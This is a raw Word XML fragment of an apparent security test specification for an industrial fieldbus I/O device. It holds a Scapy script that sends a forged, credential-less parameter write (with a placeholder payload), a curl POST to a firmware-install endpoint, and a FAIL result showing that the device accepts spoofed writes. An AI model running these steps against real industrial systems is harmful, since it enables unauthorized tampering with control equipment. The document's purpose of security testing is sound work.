        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DE96DD4" w14:textId="1FC94202" w:rsidR="00233097" w:rsidRPr="006D5B99" w:rsidRDefault="00224B63" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ011-03 - Fieldbus Parameter Write Without Device-Side Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D96152" w14:textId="77777777" w:rsidR="00233097" w:rsidRPr="006D5B99" w:rsidRDefault="00233097" w:rsidP="0023309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6D5B99"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6D5B99" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B6421F0"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6D5B99" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C9460FF" w14:textId="45391E74" w:rsidR="00233097" w:rsidRPr="006D5B99"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RQ-011 </w:t>
            </w:r>
            <w:r w:rsidR="006861EF" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 1.1 / CR 1.2 / CR 2.1 </w:t>
            </w:r>
            <w:r w:rsidR="006861EF" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset B, Asset F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48FF28E7" w14:textId="2EACA099" w:rsidR="00233097" w:rsidRPr="006D5B99"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 + Spoofing + Elevation of Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1146747B" w14:textId="24DA7FDC" w:rsidR="00233097" w:rsidRPr="006D5B99"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233097" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7920D1DF" w14:textId="5238B35A" w:rsidR="00233097" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33086F3C" w14:textId="7777777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Observe the legitimate configuration sequence.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A00EE9" w14:textId="01F31687" w:rsidR="002D4350"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an unauthorized node (impersonating the controller or injecting during the configuration phase), present a modified parameter record with recomputed integrity values.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="457F66F0" w14:textId="4868F0BD" w:rsidR="00233097" w:rsidRPr="006D5B99"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Determine whether the device demands any authentication before accepting the write.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12FBF9C8" w14:textId="77777777" w:rsidR="002D4350"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requires authentication/authorization before accepting a parameter write. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6303C2DC" w14:textId="17532C3A" w:rsidR="00233097" w:rsidRPr="006D5B99"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the only checks are addressing + integrity values (no credential) </w:t>
            </w:r>
            <w:r w:rsidR="006B69B4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms </w:t>
            </w:r>
            <w:r w:rsidR="00C63922" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authorization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is delegated. The finding here is the absence of an </w:t>
            </w:r>
            <w:r w:rsidR="00C63922" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authorization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> credential, distinct from the integrity-value forgeability of TC-</w:t>
            </w:r>
            <w:r w:rsidR="0022010B" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>005-</w:t>
            </w:r>
            <w:r w:rsidR="0022010B" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>02</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E9714C0" w14:textId="77777777" w:rsidR="00233097" w:rsidRPr="006D5B99" w:rsidRDefault="00233097" w:rsidP="00233097">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5503C35E" w14:textId="77777777" w:rsidR="00233097" w:rsidRPr="006D5B99" w:rsidRDefault="00233097" w:rsidP="0023309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12"/>
        <w:gridCol w:w="7776"/>
      </w:tblGrid>
      <w:tr w:rsidR="00233097" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B4BDC72" w14:textId="77777777" w:rsidR="00233097" w:rsidRPr="006D5B99"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233097" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58FBE9C5" w14:textId="627C8229" w:rsidR="00233097" w:rsidRPr="006D5B99" w:rsidRDefault="00257CB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TC-RQ011-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345A03" w:rsidRPr="006D5B99"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345A03" w:rsidRPr="006D5B99" w:rsidRDefault="00345A03" w:rsidP="00345A03">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="373B0010" w14:textId="6660E3A9" w:rsidR="00345A03" w:rsidRPr="006D5B99" w:rsidRDefault="00113787" w:rsidP="00345A0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NV1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345A03" w:rsidRPr="006D5B99"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345A03" w:rsidRPr="006D5B99" w:rsidRDefault="00345A03" w:rsidP="00345A03">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45EF2AA3" w14:textId="2E0AAB0E"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t>Scapy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345A03" w:rsidRPr="006D5B99"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345A03" w:rsidRPr="006D5B99" w:rsidRDefault="00345A03" w:rsidP="00345A03">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3508DBD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Bring the SRIO into Parametrization (disconnect the real PLC / let the</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FE6D47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device go through Init again).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4572DC9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From Kali, send an acyclic write with the correct destination address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="628629A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and a self-computed, valid iParCRC (no credential attached):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FF8FBD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cat &gt; cm_rq011-03_write.py &lt;&lt; 'PYEOF'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DE1E0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from scapy.all import Ether, Raw, sendp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D607CAC"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iface = "eth1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="799BCA24"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target_mac = "AA:BB:CC:DD:EE:FF"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68A6CA6D"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forged_param_write = bytes.fromhex("REPLACE_WITH_ACYCLIC_WRITE_PLUS_VALID_CRC_HEX")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61B0A178"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sendp(Ether(dst=target_mac, type=0x8892)/Raw(load=forged_param_write),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="502F6BA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iface=iface, count=1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4642F26A"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PYEOF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="115A9E2F"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python3 cm_rq011-03_write.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C732419" w14:textId="77777777" w:rsidR="00345A03" w:rsidRPr="006D5B99" w:rsidRDefault="00345A03" w:rsidP="00345A03">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Observe the reaction (acceptance/rejection, error message) in the TIA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="499B9BFA" w14:textId="483CC7AC" w:rsidR="00345A03" w:rsidRPr="006D5B99" w:rsidRDefault="00345A03" w:rsidP="00345A0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watch table / diagnostics buffer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345A03" w:rsidRPr="006D5B99"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62C9B1DE" w:rsidR="00345A03" w:rsidRPr="006D5B99" w:rsidRDefault="00345A03" w:rsidP="00345A03">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D861E8F" w14:textId="1D8CE9B4" w:rsidR="00345A03" w:rsidRPr="006D5B99" w:rsidRDefault="00345A03" w:rsidP="00345A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FAIL (against the requirement) </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the SRIO only checks addressing + CRC consistency, no sender authentication; a syntactically correct telegram is accepted regardless of the sender.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F3B7009" w14:textId="77777777" w:rsidR="00113787" w:rsidRPr="006D5B99" w:rsidRDefault="00113787" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C570259" w14:textId="0147F122" w:rsidR="005C57A2" w:rsidRPr="006D5B99" w:rsidRDefault="00F3610F" w:rsidP="005C57A2">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ011-04</w:t>
      </w:r>
      <w:r w:rsidR="005C57A2" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C57A2" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Firmware-Update Mode Gate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1184B7" w14:textId="248BA573" w:rsidR="00F3610F" w:rsidRPr="006D5B99" w:rsidRDefault="00F3610F" w:rsidP="005C57A2">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C9A87B3"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0E5D9165" w14:textId="3006D991" w:rsidR="00F3610F" w:rsidRPr="006D5B99"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RQ-011 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> EDR 3.10 / CR 2.1 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset G, Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F3610F" w:rsidRPr="006D5B99"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2F3681AE" w14:textId="47812E95"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Elevation of Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F3610F" w:rsidRPr="006D5B99"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53D9244" w14:textId="5921BB42" w:rsidR="00F3610F" w:rsidRPr="006D5B99"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SVV-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F3610F" w:rsidRPr="006D5B99"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1154E0F7" w14:textId="4F322B2D" w:rsidR="00F3610F" w:rsidRPr="006D5B99"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Validate the update </w:t>
            </w:r>
            <w:r w:rsidR="000E700D" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authorization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> gate: an update attempt outside the update state is rejected, while an attempt in the update state is accepted,  bounding the delegated-</w:t>
            </w:r>
            <w:r w:rsidR="000E700D" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authorization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> gap by confirming the </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>mode gate operates.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F3610F" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00F3610F" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63E3D9A0"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 firmware update while the device is not in the update state.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3720C30A"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rejection.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EE73065" w14:textId="77777777" w:rsidR="004C3C07"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Place the device in the update state and attempt again.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46983669" w14:textId="063883C3" w:rsidR="00F3610F" w:rsidRPr="006D5B99"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acceptance of the (validated) update.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F3610F" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00F3610F" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64B04DDF" w14:textId="77777777" w:rsidR="004C3C07"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if the update is rejected outside the update state and accepted only in it. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34B53C58" w14:textId="35464ACC" w:rsidR="00F3610F" w:rsidRPr="006D5B99"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FAIL if an update can be initiated outside the update state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="448F37DF" w14:textId="77777777" w:rsidR="00F3610F" w:rsidRPr="006D5B99" w:rsidRDefault="00F3610F" w:rsidP="00F3610F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="455F3F67"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6FC125B1"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057DE227" w14:textId="71972D6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TC-RQ011-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A544A4" w:rsidRPr="006D5B99"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A544A4" w:rsidRPr="006D5B99" w:rsidRDefault="00A544A4" w:rsidP="00A544A4">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BCDC6AE" w14:textId="2FC63F02"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TIA laptop, Kali (curl against /firmware/install)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A544A4" w:rsidRPr="006D5B99"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A544A4" w:rsidRPr="006D5B99" w:rsidRDefault="00A544A4" w:rsidP="00A544A4">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C58FFDD" w14:textId="55B89D27"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A544A4" w:rsidRPr="006D5B99"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A544A4" w:rsidRPr="006D5B99" w:rsidRDefault="00A544A4" w:rsidP="00A544A4">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2671D42F"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77E5E1F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In Operate state (NOT Update):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4919D6B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cm_rq011-04_outside_update.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F4EB6D7"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expected: rejected (SRIO-11534)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09C95530"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0BD5C851"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Rotary switch to 999 + power cycle (Update state).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23726F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p>
          <w:p w14:paraId="782DF01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Repeat the same call:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1560EFA9"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-X POST http://$SRIO/firmware/install -w "%{http_code}\n" | tee cm_rq011-04_inside_update.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42D6F48B"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without an actual container upload, a different (but equally meaningful)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B7063A5"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error is expected (no container present, instead of ‘wrong state’);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31AB810A" w14:textId="77777777" w:rsidR="00A544A4" w:rsidRPr="006D5B99" w:rsidRDefault="00A544A4" w:rsidP="00A544A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to distinguish these clearly, optionally combine with a harmless/empty</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="440BCE82" w14:textId="1B823D25" w:rsidR="00A544A4" w:rsidRPr="006D5B99" w:rsidRDefault="00A544A4" w:rsidP="00A544A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container upload as in TC-RQ005-03 steps 2-3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
